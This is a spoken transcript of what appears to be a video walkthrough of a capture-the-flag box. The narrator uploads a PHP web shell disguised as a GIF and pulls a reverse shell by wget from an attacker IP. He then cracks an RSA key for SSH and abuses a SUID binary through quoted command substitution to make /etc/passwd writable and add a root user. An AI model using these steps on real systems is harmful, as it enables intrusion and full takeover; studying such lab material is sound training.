understand. I don't get it. It's not saving the file as it says it does. It's not doing what it says it does at all. Right, we're going to give it one more go. I need to really simplify the shell, perhaps. The main thing is not to quit at the first problem. Do we have any sort of very basic... Not really. We actually don't have any basic PHP shells at all. I mean, is it running? It's not running Windows. There's no reason. Okay. Okay. Basic PHP command shell. Is what we're looking at. Yeah, it's literally just that. Okay. So the way the shell works is if we give it the command variable, all that happens is it runs that on the system. That's it. That's all there is to it. That's all there is to it. We're going to try and do this one now. I'm very annoyed. Can you tell? Because there's no reason why this shouldn't be working. And if it works with something like this, I'm going to be really irritated, because why? Right, so we'll do this. We're going to go back. Going to go back. Going to go back. In fact, we'll stick from there. I'm going to put that in there. That's all it is, just that. And then we're going to call it new shell, new sh.php. Images, new sh.php. Maybe it's because it was trying to, I don't know why it wasn't working. It's not there. It's not there. Doesn't work. I don't understand why it doesn't work. I need to go. It's been a difficult time, guys. Found something which works, but it needs to be very specific. I think this might even be a simulated vulnerability rather than an actual vulnerability, as any slight changes to this really breaks it. For a start, I've reset the box just to make sure that it wasn't bulked. So we have a new IP address. The same issue happened, right? It still accepts the ping file name and content type. I gave it a GIF header because that's just the easiest. It's only 4 characters. I don't know why I didn't think about that. And if I do this PHP echo system, it could be because it's all on one line. Now, if I go back here to this, which is what I did before, and then put testing.php, all it's doing is it's seeing if the command get parameter is set, and if it is, it actions it, and any errors it throws to the right. So that should have uploaded. That should have uploaded. So I go here, and it hasn't uploaded, right? After playing around with some formatting and settings, I simplify this. I put it all in one line. I've got rid of the moving it to dev null and stuff like that. And this works. Way to make an awesome system awful, isn't it? Okay. And you see how small that change was? I mean, what would happen if I actually put this there and put this there and did it like that, PHP and then that and then that? If I do this as command1.php, does this work? Apparently so. Does this work? Yes. So it's not even the fact that it's all been moved onto one line, it's the contents of the file. What was the difference? Let's figure out which part actually broke this. If we get rid of that, and send that as testing.php, does that work? No. No, it doesn't. What if we get rid of the check for the curly brackets and we just do that? I think that's roughly what we ended up with. No, it doesn't work. And now? This is almost the same as what we ended up with, isn't it? Nothing. This is what I don't get. Why is it not actually... Nothing. So we go back or forward or something. Is it the fact that I left a space here? Let's get rid of that. No, it's not even that. So now what's the difference? Okay, so I've missed out the word echo here. And I understand that it needs the echo in order to echo the result, right? I get that. Whoops. Where are we? But it shouldn't make any blind bit difference. So what's the only difference now between this and this? File name is the same. GIF8 is the same. This is... Let's just move that up. And now we'll see if it works. Right, I found what the issue is. I had a space after this file name, right? Now I understand why it's not working. Now I get it. Because what's happening is if it takes the new line as part of the file name, it won't show it here, but there'll be a new line. Look, if this is line 22, which it is, then we've got 23, 24 is blank, and then 25 is this. Now, if I do that, we've got line 22, 23, 24, 25 is blank. It's adding the new line to the file name. Now I understand. Now I get it entirely. I understand that. You think it'd trim. You think it'd have some sort of trim or something. Because it is successfully uploading, but it's uploading the extra file name. That's very odd. So, if we go back to our original here, the C99, and we change the IP address to the new one, which is here. So I quite like to figure out why things don't work, rather than just say, oh, that doesn't work, blah, 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 blah. It makes sense to figure out why that doesn't work. So if we change this to here, to the new IP, and we change this to the same IP, and the only thing that we change differently is that. Oh my god. So I'm not sure what's actually happened. Oh, maybe the origin is updating as well. Let's try that. No, I'm not entirely sure. Okay, but if we get the code for C99, let's do it this way. Let's get the code for C99. I just really want to try and get something else working now. I mean, this was partly my error. I did not consider the fact that new lines would cause a problem. In the same vein, though, it's very, very badly coded. Very badly coded. So now we've got gggg.php. Okay, that seems to already exist. Let's put another G at the end. You see, this is not loading C99. We've still got the GIF 8, but there's nothing else there. So yeah, okay, let's go back to our original, if we can. I'm not sure where it is now. Oy vey, wasting time on this, but that's okay. That's all right. Okay, we're going to put this down as this is the one which works. Watch out for the I'll get rid of that. Okay, and we'll take the response here as well. Wow. Okay, so yeah, partly my fault. Partly my fault, I suppose. So I'm not going to complain about this any longer. And we have, who am I? Oh, isn't that working? Oh, we need a CMD equals. Right, we're laughing now, I think. Oy vey. Right. These things happen, guys. I mean, some people are actually saying to me, oh, you're an expert and you're making these mistakes. Thank you for saying I'm an expert. Personally, I think I'm an idiot. But yes, I do make mistakes. Everybody does. Let's just get a reverse shell going because I'm fed up with this section of the challenge. It's been good regarding the database, really good actually. And this wasn't bad. It's just more the fact that I don't know. It's just more the fact I think that I wasn't really expecting. I was expecting this to just work straight off, and it didn't. I knew what to do. I've seen it before. I've used it before. Okay, let's see what we can do here. Can I literally just put this in here, or are we going to need a... Is it going to be URL encoded? Because we've got slashes and all sorts of things in here. So let's get our IP address. I'm kind of hoping this just works without too much issue. But I don't think it will. Yeah, of course it won't. Do we even have a listener? Thought we did. We do. Okay. So we're going to go into the decoder here. We're going to URL encode this into this. Put it back in here. Still nothing. Okay. Okay, so let's just try doing a wget http. Again, we've got slashes in this, so I'm not entirely sure that's going to work straight off. Let's kill this. Let's do Python 3 help, can't remember, http server port 80. We need a sudo on that. Yeah, brilliant. Oh, it's already there. Right, I'm going to try doing that and see if anything is... Yeah, nice. It is trying to grab my code. That's great. That's good. That's good. So we're actually going to run this again, but in the Prives script. So cd shells, sorry. Okay. So we're going to do this again. And we're going to do c99.php, c100.php, just because I think we've already got a c99 in this directory and we don't really want that. It's taking a while to load. It's picked it up. So I'm kind of hoping now that, let's just save this in case. We can go to c100.php. Not found on the server. Lovely, that's exactly what we want. C99 is there, but that was from ages ago. We're not able to save by the looks of it. Oh, that's sad. Unless c99.php was overwritten. Yeah, it has been, because now we've got the 500 internal error. Okay, life is good. Life is good. I understand. I understand. So, right. Let's get this shell. Let's get this shell. Oh, damn it. Ah, right. Let's go back to here. Nano PHP reverse. Get rid of that. This one is 10. What have I done? Oh, it's page down. That's fine. 10, 10. Can't remember. 14128. Run the server. Nope. Go back to wget http 10 10 14 128 php reverse shell.php. That seemed to work. Idiot. Get my listener going. Oh, God. Oh man, we got a shell. Right, I need to take a well-deserved break. Every break I've been on so far, I've been thinking, oh, what if I try this? What if I do this? Why isn't this working? What if it's this? Whereas now, if I take a break now, I've got nothing to think about because we've not gone anywhere, we've not done anything. I will be back soon, and this will be my first actual break. Thank you guys for sticking with me. It's taken a while. Okay, I've actually had a sizable break this time. Okay, so let's take a look around. Decoder is a user on the system. Oh no, it looks like we've got some sort of cryptography here. And we can't even do that. Okay. Fine. Let's take a look at what this actually is then. We're going to, whoops. Oh, that's fine. We are going to cat out decode.pub. Okay. And we're going to cat out pass.crypt as well. Oh man. Well, that looks fun, doesn't it? So public key. What am I looking at? I mean, this is a dumb question because asymmetric encryption uses public keys like PGP and things, but DSA, RSA, yeah, of course, and DSA as well. Okay, if this is DSA or RSA, what is happening? There we go. Oh, of course, we've got RSA private keys, but that's not what I was looking for. Actually, I was looking for. There was something where we had. There's something where we had like P and Q and N. Do you remember that? I can't remember when that was. There we go. So P, Q, and E, that's right, was all written to the, okay, password. Yeah, I remember this one. Okay. Now, interestingly enough, if I go to, nope. If I go to, like, documents. Oh, no, there's nothing in here because I cleared my system, didn't I? No matter. No matter. I thought it'd be in there, but it's not. No. Okay, that's fine. There was some RSA code that I wrote back in, well, many years ago. In Java, but obviously that's not going to help us here if I've not got it. There is the RSA CTF tool though, which makes things like this easier. Right, the first thing to do is get these files onto my system. I've just killed my shell. I hate that Control C kills a shell when everywhere else Control C is copy. So annoying. Go away. Thankfully I can get this shell back very easily. Okay, now the thing is pass.crypt isn't going to transfer very well. Can I just do like Python M hang on. Okay, so Python 3 HTTP server on port 9999 as an example. And then can I just do like a wget? I'm just doing what I normally do, but in reverse, you know? That's wget HTTP. What is the IP address? Is here. On port 9999. And then we're going to grab decoder.pub. That's not possible. That's not possible. Okay. What if we do base 64 decoder.pub? Okay, then on my system, nano decoder.pub, and then base 64 decode, and we're going to save that, overwrite it. So now if I cat, oh, that didn't work. That didn't work at all. Oh man. Let's paste that in again. Okay. Yeah, I know, long way around. Okay, well it worked. It was a roundabout way. I'll do it quicker. I'll do it easier this time. Now they know what's happening. We're going to go base 64 pass.crypt. And then nano pass.crypt1. Yeah, why not? Okay, that kind of worked. We do some. We use base 64 to encode these files and copy, paste, decode on our system. Let's see if the RSA tool actually works here. It could be RSA. That's the first sort of thing that came up here. So, yeah, that makes sense. It makes sense to try it first, doesn't it? So we're going to go into Tools, into the virtual environment which I set up, and then Source, bin, activate. I think that's it. So now we're in a virtual environment, and in here we've got RSA CTF tool. Brilliant. Good. So, all right, how are we going to do this then? This tool is meant for educational purposes. So we need a public key. We need a decrypt file. And I guess private. Yeah, so the public key file, fine. Decrypt file. Okay, decrypt cipher. Okay. Display private key if recovered. We probably don't need that. And then we can optionally specify MP, Q, E, and D. Well, let's just try this straight off. So we're going to go RSA CTF tool. Public key is that right? Public key is going to be decoder. Ah, it's not in here. Damn it. Okay. And then decrypt file. We can go again here. Boxes. Charon. Crypt. Oh my god. Unrecognized argument. Public key. I wonder if it's a. I wonder if it needs a absolute path, but I think the best thing for me to do would be to actually go to boxes. Charon. We're still in the virtual environment, you see, and now everything is here. So we can pretty much go again, but I just need to do that. And the decrypt file, I can literally just do that in theory. Unrecognized arguments, public key. Okay, so what am I doing wrong? Ah, there's no, that's fine. So it would have worked. There's just no hyphen in there. Oh, there we go. Wow. So let's take a look. Testing key decoder attack initialized. Results attack success. Brilliant. Padding decoded. Is that our password? I think it could be. I'll do that to show in the virtual environment, I think. Honestly, that was a lot simpler than it could have been. I wasn't doing that manually. I mean, can we literally just... Let's exit out of the virtual environment. I feel like being here. Oh, I've actually exited out the whole shell. That's okay. Let's do SSH decoder at 10.129 53 204. Okay, nice. We actually have SSH access now. So at this point, if I stop here, I'm not going to stop here, but if I stop here, then next time I come back to this, I can literally just put in this SSH username password and gain access to the system, and it's going to save so much time. It's going to save so much time. Let's go into, hang on a minute. Oh no, we seem to be okay. So cat user.text. Something's wrong with the shell, but that's okay. That's actually okay. Cat user.text. We have the user.text. Finally, it took us like 15 years, but we got there. I think at this point I'm getting tired. I'm just going to limpies it up and see what happens. So wget http 10 is 10.14. I can't remember 129. Is that right? Oh, that was close. 128. Limpies. Sh. Obviously, first I need my listener. It's currently in shells, so let's kill it. CD press scripts, and then that was easier than I thought it'd be. Chmod plus X Yeah, that's fine. And then... Right, we're limp-easing. Right, while this is running, I'm going to check my messages. I've got no messages. Nobody loves me at all. Boo. Let's see what this comes up with, shall we? I'm just waiting for it to calm down slightly before... Oh, I'm waiting for this to calm down slightly before I do this. I'm hoping this is going to be a relatively easy route. Something like sudo su would be absolutely amazing if you don't mind. But I know that this is rated hard for a reason. I mean, to be fair, we have seen the reasons. We have seen the reasons. Ooh, oh no, that's just path. Okay, well, it could be useful knowing that our user is in the path. So if we get like a suid, which then calls another file, we can make our own copy of a file in our directory. That's fine. Let's take a look. I've started glossing through the beginning of this, but I really shouldn't start paying attention. I was just looking for red and yellow, and that's not going to happen here. Writable listeners, not bothered about. Unit sockets, not bothered about. Okay, network information. That's fine. Oh, port 9999 is actually open because I just ran that code, if you remember the Python thing, but for some reason we couldn't connect to it, so there must be firewall rules. We have the database running, we've got SSH, and we've got the web, so that's fine, we expect that. So I can't use SU anywhere. Sudo, sorry. MySQL connections, fair enough. So we've got super CMS, freeze, roots. Okay. I don't know. Fun times. Known hosts. Okay, analyzing FTP files. Nope. Nope. Bash RC profile. Oh, here we go. Use a local bin supershell. Unknown suid binary. Yes. Okay. So this is going to be the way in, I think. I don't know what this binary does. We will have to figure it out as we go. But it might be okay. Okay, there's nothing really important on the capabilities. Readable files belong to root. Use a local bin supershell. Just going back up to that, it's interesting that there was no rights for the www data user, so I wouldn't have been able to do this straight off. I did actually need to get in as decoder. Got a backup SQL file. Got a config.php here as well. Could be useful. Make a note of those. Okay, it looks like we are going to be playing around with this, whatever it does. So let's give this a paste. Supershell command. Okay, who am I? Okay, it's gone in twice. Okay, everything's slowing down. Laptop might be freezing. Okay, it's not actually running any of my commands. So I wonder if there's any specific commands which it does run. If I use strings, then oh, I don't like that. If I use strings, then I know I don't like that. Hang on. There we go. There we go. Right. Okay. So I've used strings on this, so we can see what's in there. That's readable. libc set UID. Right. If it's using set UID, it might be changing our user to root at a certain point. String length. glibc supershell very beta. Bin ls. Okay, it has bin ls. Interesting. Okay. So, using strings shows it's got all these characters as well. Does that mean these are maybe filtered characters? Right, let me just hang on. Are these filtered cars? Question mark. Then bin ls does is this command permitted? Those are our questions. So let's try this. Oh, I've not got up arrow. That's really weird. To say that this is hang on. I've still not got up arrow. That's still weird. But at least I've got a better thing now. Right. Okay. So let's run this with bin ls. Because I've tried it with ls and that didn't really seem to do anything. Huh. So that actually works. That's interesting. So what happens if can I give it an extra flag like A? No, I can't. What about if I put it in here like that? Ah, that does work. Interesting. Okay. We cannot pass it the any flags without placing our command in quotes. I'm guessing it only allows maybe one. I'm guessing it only allows one command or one argument, I should say, and giving it -a-a, it maybe sees it as another argument. So putting it in quotes, it's all one argument now, I think. So if we look here, what could I actually do with this? I mean, assuming that these characters are filtered, we cannot pipe. We cannot end our command with a semicolon. We cannot move things into files. We cannot use AND in order to get another command running. Okay, so let's just go through some other special characters that are not decoded and see what we've got. Exclamation mark, and I'm just going through the top row. So double quotes, pound, dollar is permitted, percent is permitted, that we can't use and, we can use asterisk, we can use these brackets, we can use at, we can't use semicolons, but we can use a colon, we can use question mark, we can't use that slash, but we can use that slash. Okay, so what can I do with these characters? What about a there we go. What's it called? It's like a subcommand, but I can't remember what it's called. Like subquery or something. Honestly, it's just slipped my mind. So if I do this with who am I? Let's try this. Let's try this. So we're going to go user. Do you know what? I'm literally just going to go into the user local bin directory just so I can write supershell. I'll leave it as that. So we've got quote ls, no, bin ls, subquery, who am I? Can I access decoder? So that's our user. It's trying to open ls on the result of this command. So the result, this is done first, and then it says bin ls decoder, and it says can I access decoder. So we was able to get the who am I out of that using an error message. Wow, okay, this is great. Okay, we can run commands using like subcommands or whatever they're called, subquery, and gain the output as part of the error message. Now here's the thing, in doing who am I and it's saying decoder, you can see this is the command here. I thought it was going to, I honestly thought it was going to say root, because as far as I know, this actually, from what I saw, it sets the UID, right? So what's the point in doing this if I can only save things as decoder? I'll tell you what I will do is I'm going to run this again. But this time I'm going to do touch moo. So it's making a new file, right? Called moo. Cannot touch moo, permission denied. Yeah, of course. So it won't let me do that because it isn't doing it as root. So where, okay. This is meant to be a SUID, S-U-I-D file, right? So why is this not running as root? Why is this not running as root? Or do I actually have to do it like this? Or do I have to give it the full path? User local bin. Oh man. Supershell. Permission denied. So it's not letting me write things. So it's not, hang on, let's trace through this. I've just thought about this. Let's ltrace supershell. Okay, let's try again. Okay, so this is what the app's doing. It's copying whatever we put into a 255 byte buffer. It's not sure. It's checking the string length. I think it's making sure it doesn't have any of these here. And then if mu equals, all right, if the first 7 characters of this is bin ls, which it isn't. So this time it's going to get a bit further. Oh, so after bin ls, it sets the UID to 0. So it is root here. And then system bin ls supershell. Okay, so what happens if I then do like... Where's my previous attempt? What if I try and do this? So where is it trying to do the touch move? I don't think it is. It's trying to do this first. That's why. It's trying to do this first, and then it's putting the result of this here. So that will not work, will it? That won't work at all. What if then, if it's trying to do this first... I don't think this is going to work either, but we'll try it. What if we do a bash shell? Oh, no, I can't. Because it's going to do that first. I'm still going to be... I'm not going to be... Hang on a minute. What's the end goal here? I don't need to be the root user. All I need is the root flag showing that I could read system files. Permission denied. That didn't work. So it worked with who am I? I think I'm on the right idea. My wife's just come home from work. It's 4:15. So I'm going to think on this and be back. I think I'm on the right idea. Okay, I'm back. So going right back to basics, if I go to supershell, followed by bin, hang on, keep this in quotes, bin ls, with a who am I would expect that to show root, but it shows decoder. Hang on. Single quotes and double quotes differ in their treatment of variables. Yes, I thought so. Single quotes preserve the literal value of variables and disable variable expansion and command substitution. Single quotes won't. Variables backticks, escapes. Is it really that simple? single quotes. Oh my god, cannot access root. So, okay, if I do it in double quotes, it evaluates it, and this, and if I, right, I could tell you exactly what's happening. I can tell you what's happening. If I put it in double quotes, it runs the command, and then we've got supershell bin ls decoder, right? If I put it in single quotes, it doesn't run the command. That's what it says here. So it won't run this. It won't run this and become decoder. It stays as who am I. So now we've got, it basically runs the bin ls this first, but it won't run this. It'll just stay as who am I. Then we get sent to root. The UID is changed to 0, and now it'll do supershell bin ls who am I, and then it's at this point root comes back. Oh my god. And yes, I can just read the root.txt file, but I reckon I can actually gain root access now. I really do think I can. Okay, so let's make a copy of this for the notes. Double quotes, execute the command before. I hope this is right. It sounds right. Supershell runs. Yeah, I think so. Single quotes. Keep the who am I command. Then once supershell runs, the UID is changed to 0, which is root, and who am I is finally evaluated in context. If I've got something wrong here, please, guys, please let me know, but that's the way I see it. That's the way I see it. Finally evaluated in context. So we actually get root here, and from here I reckon I can do a reverse shell or whatever. Do you know what? Do you know what's probably the easiest thing of all? I could just read the root file. But what the easiest thing of all is something I've done so many times. And that's this. The last time I did this was, I don't know. Can't remember the last time I did it, but we'll just take this one. If I echo root, oh, we've got quotes though. That's going to mess things up, isn't it? And I can't use this either. So that isn't going to work, actually. That's really not going to work. I thought I could add something to the etc password, but that's actually not true at all. So we can't do that. What could we do? We could do a reverse shell, probably, although they've got angle brackets in it as well. What else could we do? I'll tell you what we could do. I'll tell you what we can do, right? How about I'm thinking that if I make a copy of like the bin bash and then give it sewage rights, would that work? What are our, would it allow a plus here? I suppose it doesn't need it. I'm not sure if this will work, but let's try it. Let's try it. Let's copy bin bash here. Of course not. Let's try again. Copy bin bash to home decoder bash. Okay. And then add suid to a file. Okay, so I could always just change the rights of etc password. Why don't I do that? That's much easier. That's much easier. Okay, let's try that. Chmod 777, which is open rights to, oh, can I use that slash? Maybe. Should we try that? Right, so we run that. And now we can lsl etc password, and you'll see that anybody has now got rights to edit this. So I could nano, in theory, etc password. And then I can literally put in this root 2 line and save it. This makes sense. So let's find the root 2 line again. I just want to get root access on the box, you know. Oh, I could have also made a SSH key for root as well. That would work. So I'm going to take this whole line here, paste that in here, save that, exit, and then su root 2. Okay, that works. That worked. That's wrong. That's Europa. We don't want that. There we go. We add our usual root. I'll just put second root user to the file using nano and su root 2. That one was insane, guys. I mean, it was hard technically, but you know what I mean. That's pretty special. I'm so tired. On the whole, a good box. I didn't like the whole extra line in that file, which really screwed me over for the longest time. You know, this extra line down here, new line. That was my fault, I think, but there still should be some kind of trim or whatever, I guess. Other than that, I think everything was okay. Got a bit lucky with the RSA, that's what I assumed it was, and I was right in the end, but, well, not even in the end, like from the start. Let's just get this finished, because I've had enough of this for now. Wow, that one was difficult. Anyway, thank you for joining me. I appreciate it. Please leave a like, please subscribe, share the playlist around if you can, share the video around, and I will see you on Tuesday. For Try Hack Me. What am I going to say about this? I think, yeah, that was a bit hard, definitely. And this, the same. Okay, it's still under 1,000 roots. If you want to get this done, do it now. Thanks, guys, and please visit Nethemba.com for all your pen testing needs. Goodbye.